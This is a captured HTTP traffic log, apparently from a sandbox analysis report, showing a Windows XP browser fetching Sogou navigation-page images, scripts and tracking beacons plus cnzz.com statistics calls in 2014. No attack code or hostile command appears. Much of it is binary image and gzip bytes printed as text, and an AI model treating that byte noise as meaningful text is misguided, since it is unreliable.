Transfer-Encoding: chunked

Connection: keep-alive

Expires: Sun, 08 Jun 2014 03:33:25 GMT

Cache-Control: max-age=604800

Content-Encoding: gzip
600a...............v.G....<.....X.D.={...m.....MK.v7I{.R.A.......&l
t;.y..d.......!.g.Y..ZDU.=#.......]..M.|.....o.O..^..=\\.m..b9y4......
{...j.o...t1o..A.6>..G...}._....O.g....e..Y....e.x...W.....j...M.[.
...Yw..]..../{...b......n.;x..../F..w.%.G.Y.m....a.`.^.....l~S4.?:j...
...7..Y.U6[..n.=).......f]6..1..io1...../.I.u.^...u.mc..).....{..g =..
..f6k..o.`t.hPa.;.u.n....9j..............3.......u{w....4.J.....]X.Q..
.NK{<^,....|..f...Q.4.<.nOW_]]...0.(..f.dp.j.....t~S....f..h.e.h
.(..&.....y... {..g.....f.........f.?.6.([email protected]..[...
.*[email protected][email protected]>N.............l.wE?u%....l....Y...>u.W.
~.9.T0..G..........g.;(..js.Og..8a......V.W..`;.......?_.........a.q..
...*[email protected]..~5 ..u..<h...d}....4....u..J
p:.v...0...xhx..........9h.<>.........P5.!-...e..v..WM.K.Eg(....
0.n..W_.QN.v...}.e1f.....*&.aP.[.yw.._.. ..3...r].Mhr>...$|.6.....S
N.G..E.=.y..;.=).G...[0.Zm.G#.`X..........y...?.O.v..4o..M.... ..MGc..
>B...fV......<....~o_..IY/.........]....C.0....2..aN........w...
.w..n.n....u.|}5....b^..L....?x.>...h#.lY...&..V.c#...o. ..k?....vK
#.....l....^.`..0..t./..u.vS.H}.e....&v....m....02\.b?v.".......... .W
.0......=z..p9...0..k..~....Z...\.W...N.i....."?5.3..p.....m....t^....
e....V'5c...|..|6.nb..W?9....,[;.\....K......F..8`...~.p...cq"....N..=
.C.<j....x.S<.....C."^..g.C;w.}D,......Q..`....V|h..._.w..N....0
.%..?.S....|.R}..........1......t<~29...A.N.g.....Z......H.....Ec1.
....^s_..<....[.7{...!.....u2.... ...b8.A1.B8-...]._7.Z5.0.....<<< skipped >>>

GET /imgn/sehome/tjv1/subnav_v41.png HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: p0.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:25 GMT

Content-Type: image/png

Content-Length: 3655

Last-Modified: Mon, 28 Jan 2013 13:46:09 GMT

Connection: keep-alive

Expires: Tue, 01 Jul 2014 03:33:25 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes
.PNG........IHDR...............x.....sBIT.....O.....PLTE"5R..L4s...$.?
....fff............iV*.ji......t.........hC...)Bd.....k...........f...
...9..............Q`w..Y[ZZ.......YRGGG;`......k.4/..B..E...J..f......
....`.....}...-D.....zq...f......rP..T........N....eW...i|...r..`..LGt
...dR....<..................O....T..........MI.../Kr.J-...........t
..e.....}}.....333..I......wvw`..I}........iC......4U.....( ..........
.......3.....W.....:.."w....S........n..x.....B.....\..sAj...r..b.....
...d...........}b...........IYq...9X......Jr......m9.....Q.........]..
.....a..:.yR..G......Lz.k..........~..f........IEq...Qp........... Fj.
...............................m..Ko....^9].........z........jW.......
.T....S7Qs.....[..W..C..J....................................b..Cm.R}.
...........J..')Jk{.......:..cl..=d......k..;..H.....jLt.B..f....tRNS.
......................................................................
......................................................................
......................................................................
.............................................s.......pHYs...........~.
....tEXtSoftware.Adobe FireworksO..N....tEXtXML:com.adobe.xmp.<?xpa
cket begin="   " id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmln
s:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/
02/12-17:32:00        "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1
999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:x
mp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com<<< skipped >>>

GET /imgu/2014/05/20140526163242_997.jpg HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: p0.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:32 GMT

Content-Type: image/jpeg

Content-Length: 6150

Last-Modified: Mon, 26 May 2014 08:32:42 GMT

Connection: keep-alive

Expires: Tue, 01 Jul 2014 03:33:32 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes
......JFIF.............0Exif..II*.......1...............VVV.meitu.com.
...C..................................................................
..C...................................................................
....=._...............................................................
}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUV
WXYZcdefghijstuvwxyz..................................................
......................................................................
......w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFG
HIJSTUVWXYZcdefghijstuvwxyz...........................................
.........................................?........WX.g.......]=.%.._..
........jTc.7a6.d..>..`..kK...o~.....!kI............a.e.......x,}:|
....1..2....j .W_12..........x#....2. :....%uJV.g.u....z.......[`.#Z..
...1.?.uC.BiJ2_y.(TI.E.... ......./......o.k.&...^.../.... ...$....%.H
Q.s...'k.z...\...J.y..o....=gM...k.h.BkK.t..P.........y..N....RWG...W.
..........Y....................G...~.fet.{.^....o.x..M...,.<.".....
....J..89[bcR.J/............?...>/.K...Vp.....N.....|.m<........
l.=....W.....>.1...\...Z.{.......!....X_..7W.o.....z;......\.'`#..}
..)...c. .q.....?....].Z.wh...B..m.G..W.........g..........~} .s..k(..
.....K..Q....g..)....:F.m..Q@...)..O...........N....|.1.8...>.. ...
..z..........O"B..:ds...s_I..X.U...'...L..:ma......n.....g.'.>(|,.D
.....5=*..K=...B..%.$....Vj..k.....y.J.1t.)9[.S...'.u......._..g.M.muM
>8....M........oj.3&..^..;..f4~......_......[L......h.....c...I<<< skipped >>>

GET /imgn/v32/logo_1112293.gif HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: p5.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:25 GMT

Content-Type: image/gif

Content-Length: 4512

Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT

Connection: keep-alive

Expires: Tue, 01 Jul 2014 03:33:25 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes
GIF89a..B...................................J}.v....._.,..;..-a.5m.J..
Z..R..x..`....................................`..]..]..[..Y..V..R..N..
M~.Iy.Eq.Bm.[..f.._..O..a..V..\..Kw.Is.d..T..Rx'g.V..i..Mz.k..w.......
....................w..s..q..o..l..l..i..f..b..]..Ly.Hs.~..u..s..d.._.
.P|.Z..y..u..i..^.....|..r..u..o..k..e..\..a..Ox.h.....X.....{..j.(..#
\~4y.K..:w.4j.E..S..W..p..|.....w.....................................
..............z..h..e.....o.....y...........y.&..(..(..!p.&y.5..=..=..
<..;..<..D..G..;..C..B..J..A..;..O..N..L..O..S..S..L..Y..Y..R..D
..<q.^..a..h..f..e..{..^...........................................
......................................................................
......................................................................
....................!.......,......B........H......*\......#J.H.....3j
...... C..I....(S.\.....".i.G..Mr..M...g.k.....n.......'/.7.P.>....
.o..q..u .s....&.......;[email protected]..}[7
.\[email protected]]9r...}..[..6X.^A...n...........|x....../.F.N..rG..
[.721.-d...B...1t..1....vOU&p........x...r.... ........Cv,....8....3..
......:.|....-....I..}%...9.X.C8Yq..8=....).0....p..'.!D8..C.6.%.C..e.
!|...Cf.T0.. .$.9.P..1[m......Bl H...g.p..hF...y...;{9t..C...r.%..{L..
.@Kf.!..T@d...#.9....7.h#.....B.b.p..g`!..i\q..W.Q..o...4.}(...L.0.p..
I..u.D...h....JpA.G.z(..Y3O:[email protected]..........@...>...c8!n.d....b=.a
..2...C...? .......A....lE..c.01(`A..b3-6..CGv .0..%`...N0.....1..w...
9......*.Y. `.Y.C.....}..{..g.p.R.....t...}.$A T`.D..S..:(....\c56<<< skipped >>>

GET /imgu/2014/05/20140526163043_207.jpg HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: p5.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:32 GMT

Content-Type: image/jpeg

Content-Length: 5353

Last-Modified: Mon, 26 May 2014 08:30:43 GMT

Connection: keep-alive

Expires: Tue, 01 Jul 2014 03:33:32 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes
......JFIF.............0Exif..II*.......1...............VVV.meitu.com.
...C..................................................................
..C...................................................................
....=._...............................................................
}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUV
WXYZcdefghijstuvwxyz..................................................
......................................................................
......w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFG
HIJSTUVWXYZcdefghijstuvwxyz...........................................
.........................................?...:f..&.......L..P[f x..=.`
UF6Z..&~b..b...Z/.e....a..a..|gc.......i2......<..f.....p..{\R....l
...m~.....^/...=..S.U.e`C...6..'.O...ge....O{.M.......gt,|[...nm.BnJ..
.,.4.F~..9.r .U...RV..7...`[email protected]...
.m4........q..J..~......;x..\..R..|ZM.c.^i.2G.F.#.".w*.B.......#vJJR..
.<..?......U.k...C...^Y....A..Ub..V(..>..p;C....I.M...(D.s..%...
es...._..m...{....uuu;.v.....e......s)J..5..|].....Z..|..;..B.!w.Etm.L
..|)..~Tp$&C.r..N.......`...M~....@...:.:..c...q.x|..}...W.Keb.C..|...
.r.....=.?J....<5/.....z..C.h.i.p...........u..u.?...1}......(.. .~
}...L....Q.......5.|k..G.g...ou=n.k...)y$.Y...O/#3.I.$..../{.j.....x..
..m..{.... ....N:...j..D....M...X..s..D..]...F.Ny<..S~.y...:].D...?
....._.....Eol.][$P..x.b.!...3..^d.Jt...{O*.R..Q..l.. .o.$...j.G..gL..
..t..m..w..WS....P].U.R...&.,^aG..B.D.2x8.<...&.'.....q.H...\?.<<< skipped >>>

GET /jsn/v33_sugg_ajaj_v40_3.js HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: d.123.sogou.com

Connection: Keep-Alive

Cookie: ipt=0; SDUV=1401576016258_7438_00001; CKOR=7763_00001_00000; CKOD=1371_00000_00000; GOTO=Af22014


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:27 GMT

Content-Type: application/x-javascript

Last-Modified: Fri, 02 Aug 2013 03:01:34 GMT

Transfer-Encoding: chunked

Connection: keep-alive

Content-Encoding: gzip
12ba.............Z{w.........5{<."..;..Y.q...W<..;.\6.A.d.......
...VK.;...............5J.a..~-..Az...*..W.HM....j.....XJ0xt..R_. k.es.
..c.l..Y.Dz.;.......m...HUn..gJ}..k...,...z.:.3...J&n.-,6^.s..5...vS..
.`...Oc..Bw..z...T.Rz..4qm.~.N.T4...8.?`...........N.I......6....}...F
.......9....v....;q....h...A4c....V...F.....k&j..a...91#.n....x...s...
..N..`.h$M......}....?...?...=Yl..8K...................k.ZhA.o...ol.}.
..p....~n9I.. ..$.......L...w.......g....H...|f...4ADSy.(.......=^..v.
...v.'......u...gC..'*..*....#....Z......o..*.#'I#.v.....s.\>..6...
...5[c.|Vb.....l.l..k7N...._..D.....4.$l8.d...J..........m.....%.Z.F..
-...>.3...k....a.D....U... 3U...]...w........c2...(..a...VO.$I.....
....s}...M9N.q.=.....9.0..._...,.|.He....r...........>g^....u.%....
7.....DU..*..J....R'i.h%Q@.<.........%.7..%pVbO....V1'!!^..}...caj.
b\......Qv....(.i.S.."..|...a..1..........X.....l.,9n....x0..6Tg......
..S.8.36&K..hhA....U.T.J....-.'.J..i..)...l.5.v.ih..w..l...fS.y..5...7
o....i...P ..V......x.M..Z4.:[email protected]...<..|.{
X.o`!_..K.P.....a....>./...*/.|......m.X.W.!.....$...r(..4.....0|..
|.* LzF.3->..k..:.X...\.].........Q..{._....'........Q9M.........q.
..........K.....GH..I..c.U....e>.../.'=N...-......W..^Y.p.!..>].
.:.NU..GM..^o.9N.%.(GAD.v.&I...!.s.q2..F..q...."h....%...o.".M......H)
..,...(..,[email protected]|...{..*....`x.....:...A..S......r.?}....!.`.0..&..!..#
.#";.#....e3.0gG.J.=#..a.......Oz.|.q`..D.L... .z.....#..=6t.RTla)...[
Gz'B3..:...b.SZ.}#W9.W...Vi....U>.)W.g....dZ(.. ....S.j>...#<<< skipped >>>

GET /v53/imgn/guide_tip.png HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: d.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:32 GMT

Content-Type: image/png

Content-Length: 10442

Last-Modified: Thu, 14 Nov 2013 11:00:56 GMT

Connection: keep-alive

Accept-Ranges: bytes
.PNG........IHDR.......J.......D.....tEXtSoftware.Adobe ImageReadyq.e&
lt;...$iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CS5.1 Macintosh" xmpMM:InstanceID="xmp.iid:CEC0416D02FB11E388CB8B
2E3040A42A" xmpMM:DocumentID="xmp.did:CEC0416E02FB11E388CB8B2E3040A42A
"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CEC0416B02FB11E3
88CB8B2E3040A42A" stRef:documentID="xmp.did:CEC0416C02FB11E388CB8B2E30
40A42A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta&
gt; <?xpacket end="r"?>.Z....%<IDATx..].....&.(..."...ky.....
.f...7..........W@%.`..@A.*(...P..;K......E|..;g.....?[....>.<..
...........i......h-....@_~.. _&.2%...<..........k......w.d./.....U
 8..r./=|..9.{.P .IT.r.J.b].|...3|....../7....]1..=?..M]Y.f.....n...7l
.:w......Vk?.gkk 8.z..........ps...^p........P-....Z..._.6l.....KWWW.j
jj...........Q..P.~.|..Y..O......... .}...GI...3k..#......KS.....n..r.
rm..../.....'JUUU..aIT....V......4...]P.......M.....Y..xju6...2...|.o3
......?...>X\..V[[......}(//........o.CEM...f.N..Z.....O. ..7hU.qC=
p&/........@.|'gA.1.>.$....{@t..P...um..A..8..].v.;..D.b.]..ss.<<< skipped >>>

GET /jsn/citydata.js HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: d.123.sogou.com

Connection: Keep-Alive

Cookie: ipt=0; SDUV=1401576016258_7438_00001; CKOR=7763_00001_00000; CKOD=1371_00000_00000; GOTO=Af22014


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:27 GMT

Content-Type: application/x-javascript

Last-Modified: Wed, 19 Sep 2012 10:54:17 GMT

Transfer-Encoding: chunked

Connection: keep-alive

Content-Encoding: gzip
5c2b............m.Yo[I...W.t..o{......'7............-.[.Z6EJ.G..(R.G..
..gK...(w..~-.g..._:....U.j..U.V.........._....o....?.........?.s.....
......s.......wZ......4Y^..K....>..e.n.nv.[@..v..<.o.].S....>
.....]d...4..LU]...7S..9...d.z.2........*..U..T..x~.y.&.!.3...x......y
....y....%.Y.W........S.s.yv. ,.2.,.M..7..k9=..|....WT..........>g.
......7..M>'..F..~_......~_...Q.>.3.Lssk.....M.....b......q5....
..Bx.6.c0......{........z...T./...-...........2.,<..(..pExy>..U.
...x..)..In..0.Q8;.P...*.........q.Y.........X..=...Y_9..bl.w?m.16....
....~....xw.l\....~..L7.{...l.6C..v.`M....n..%..F......O.~......Y....f
l...R....O....f..P.........'........ly%...\.L...9..\..a..=.V.....u3...
........W.......f.Fm..B:....?.?T..q........m.].LFj....~..Lwq..C......M
.Y..6.K......T.....FT..l..P....m....n...}..fl.r.b....5...XQtGT..).h.bG
..\[email protected].#..xffA]...v......I)/\...v'....:..........
q....Z..)...Z.rK..8.zV.F.....n.....r&;..n.q.......6...H..i=.-.&.5.Msu.
.,.........b...r..KY9.......J...Q.8.....bl..P...s.<.|...n......5..G
.j.....9.k,..R.e.%k...0..L.%....5.E...g.].1.y..G........H........a/..-
U.,6k.< .b......U.#.k.....#...<...........z.*.w.........-.z.V...
..........v.m....%z...m..,......h..6..7...../.h..6....k..:JV.z.R.....0
[email protected]....#=hH6p..,..........CLo~r.Fl~F_..TT.....P...G..&.~...i
.z......M:a....;..r..~3b..... .......}.g.\c...AL..L.l..w..]...9...].=j
=........X.2|alV....W........[b..zyc.Z... .......K2...\..X-..........0
.D0~50^..*]........l..Y...f{..<$`K8.8Q..........l.....[.(O.}5..<<< skipped >>>

GET /stat.htm?id=5645354&r=http://VVV.mdtxw.org/miniindex/&lg=en-us&ntime=1401593629&repeatip=1&rtime=0&cnzz_eid=1321967991-1401593629-&showp=1024x768&st=-17588&sin=none&t=undefinedundefinedundefined&rnd=348941059 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/xinwen.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: hzs10.cnzz.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Tengine/1.4.1

Date: Sun, 01 Jun 2014 03:33:50 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Tue, 28 May 2013 02:57:17 GMT

Connection: close

Accept-Ranges: bytes

GIF89a.............!.......,...........D..;..

GET /pv.gif?uigs_productid=ufo&ufoid=wan&ptype=jztf2&pcode=index&rdk=1401576015993&img=pv.gif&sourcelist=0011000100006_0011000100007_0011000100008_0011000100009_0011000100010_0011000100011&titlelist=çƒè¡€æ²™åŸŽ_é£Žäº‘æ— åŒ_ä»™ä¾ é“_å¤§é—¹å¤©å®«OL_ä¸‡ä¸–_Sogouå‚²å‰‘2 HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: pb.sogou.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Sun, 01 Jun 2014 03:33:26 GMT

Content-Type: text/xml

Content-Length: 0

Connection: keep-alive

Set-Cookie: SUV=008D2FB7B86B2626538A9F06D057B568; expires=Wed, 29-May-24 03:33:26 GMT; domain=.sogou.com; path=/

P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
....


GET /pv.gif?uigs_productid=ufo&ufoid=daohang&ptype=indexv53&pcode=index&rdk=1401576021055&refer=&page=æœç‹—ç½‘å€å¯¼èˆªï¼ï¼ç½‘å€å¤§å…¨,å®žç”¨ç½‘å€,å°½åœ¨123.sogou.com&pageUrl=http://123.sogou.com/?22014&img=pv.gif&vcode=v53 HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: pb.sogou.com

Connection: Keep-Alive

Cookie: GOTO=Af22014; SUV=00E57BA1B86B2626538A9F06DEF6B036


HTTP/1.1 200 OK

Server: nginx

Date: Sun, 01 Jun 2014 03:33:31 GMT

Content-Type: text/xml

Content-Length: 0

Connection: keep-alive

GET /app.gif?&cna=H40RDBRX0EsCAbhrJiYbIGdr HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Connection: Keep-Alive

Host: pcookie.cnzz.com


HTTP/1.1 200 OK

Server: Tengine

Date: Sun, 01 Jun 2014 03:33:51 GMT

Content-Type: image/gif

Content-Length: 43

Connection: keep-alive

P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"

Set-Cookie: cna=H40RDBRX0EsCAbhrJiYbIGdr; expires=Wed, 29-May-24 03:33:51 GMT; path=/; domain=.cnzz.com

Expires: Thu, 01 Jan 1970 00:00:01 GMT

Cache-Control: no-cache

Pragma: no-cache

GIF89a.............!.......,...........L..;....

GET /app.gif?&cna=H40RDLEq1ksCAbhrJiZN4/ 3 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/meinv.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: pcookie.cnzz.com

Connection: Keep-Alive

Cookie: cna=H40RDBRX0EsCAbhrJiYbIGdr


HTTP/1.1 200 OK

Server: Tengine

Date: Sun, 01 Jun 2014 03:33:52 GMT

Content-Type: image/gif

Content-Length: 43

Connection: keep-alive

P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"

Set-Cookie: cna=H40RDLEq1ksCAbhrJiZN4/ 3; expires=Wed, 29-May-24 03:33:52 GMT; path=/; domain=.cnzz.com

Expires: Thu, 01 Jan 1970 00:00:01 GMT

Cache-Control: no-cache

Pragma: no-cache

GIF89a.............!.......,...........L..;..

GET /imgu/2013/05/20130531144119_126.png HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: p2.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:28 GMT

Content-Type: image/png

Content-Length: 13613

Last-Modified: Fri, 31 May 2013 06:41:19 GMT

Connection: keep-alive

Expires: Tue, 01 Jul 2014 03:33:28 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes
.PNG........IHDR.......2.............pHYs................MiCCPPhotosho
p ICC profile..x..SwX...>..e.VB....l.."#[email protected]..
..H....(.gA..Z.U\8.....}z............y.....&...j.9R.<:...OH......H.
. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....
ly|B"......I>..................(G$.@..`U.R,......@"......Y.2G.....v
.X..@`...B,.. 8..C.... L..0...._p..H.......K.3.....w....!..l.Ba.).f.."
...#.H..L.........8?......f.l.....k.o">!.........N..._....p...u.k.[
..V.h..][email protected].<......%b..0..>[email protected].@...
...qanv.R....B1n..#......)..4.\,...X..P"M.y.R.D!......2......w....O.N.
...l.~.....X.v.@~.-......g42y.......@ ...........\...L....D..*.A......
........a.D@.$.<.B........A.T.:.............18....\..p..`........A.
..a!:..b.."......"aH4... ...Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u
@.......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v..
..a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._
.H$....N.!%.2I.IkH.H-.S.>..i.L&..m....... ......O.......:...L..$R..
.J5e?....2B...Q.......:.ZIm.vP/S...4u.%...C..-....igi.h/.t.....E....k.
......w......Hb(.k.{...../.L......T0.2..g...oUX*.*|.....:.V.~...TUsU?.
y..T.U..^V}.FU.P.........U..6..RwR.P.Q_.._...c....F..H.Tc....!..2e.XB.
rV..,k.Mb[...Lv...v/{LSCs.f.f.f..q.......9..J.!...{-.-?-..j.f.~.7.z...
b.r......up.@.,..:m:.u..6.Q....u..>.c.y.........G.m..........704.6.
.l18c...c.k.i........h...h..I.'.&..g.5x.>f.o.b.4.e.k<abi2.......
)..k.f....t...,.......9..k.a........E..J.6.....|...M....V>VyV.V<<< skipped >>>

GET /pv.gif?uigs_productid=daohang&rdk=1401576016352&img=pv.gif&pars=?rand=1401576016352&suid=null&sduv=1401576016258_7438_00001&ckid=7763_00001_00000_1371_00000_00000&m=null&apid=null&sgtp=null&refer=&page=&pageUrl=http%3A%2F%2F123.sogou.com%2F%3F22014&loc=null&hp=-1&pid=Af22014&ptype=index&pcode=index&yyid=null&skin=null&ver=v53_ie6_dr__4&sys=100&ser=null&sev=null&time=3641 HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: pb.sogou.com

Connection: Keep-Alive

Cookie: GOTO=Af22014


HTTP/1.1 200 OK

Server: nginx

Date: Sun, 01 Jun 2014 03:33:26 GMT

Content-Type: text/xml

Content-Length: 0

Connection: keep-alive

Set-Cookie: SUV=00E57BA1B86B2626538A9F06DEF6B036; expires=Wed, 29-May-24 03:33:26 GMT; domain=.sogou.com; path=/

P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

GET /imgn/v32/skin2_0.gif HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: p1.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:25 GMT

Content-Type: image/gif

Content-Length: 592

Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT

Connection: keep-alive

Expires: Tue, 01 Jul 2014 03:33:25 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

GIF89a..........Ly.Ky.Aq.Et.Iw.S..W..Z..[..a..d..c..e..g..w...........
........................s.............................................
......................................................................
......................................................................
......................................................................
...............................................!.....s.,............s.
s...s ..................)q(....&X*....#qnmol!!p<Pad%..$igbf`ch\OYIQ
"...rlj_^]PMK/U:..s...pe[ZJG7'......kNLH6CF*....W.EB35-..s............
.B$...=~.HX...*8...... ..B...`..@.;....

GET /imgu/2014/05/20140526163446_912.jpg HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: p1.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:32 GMT

Content-Type: image/jpeg

Content-Length: 5654

Last-Modified: Mon, 26 May 2014 08:34:46 GMT

Connection: keep-alive

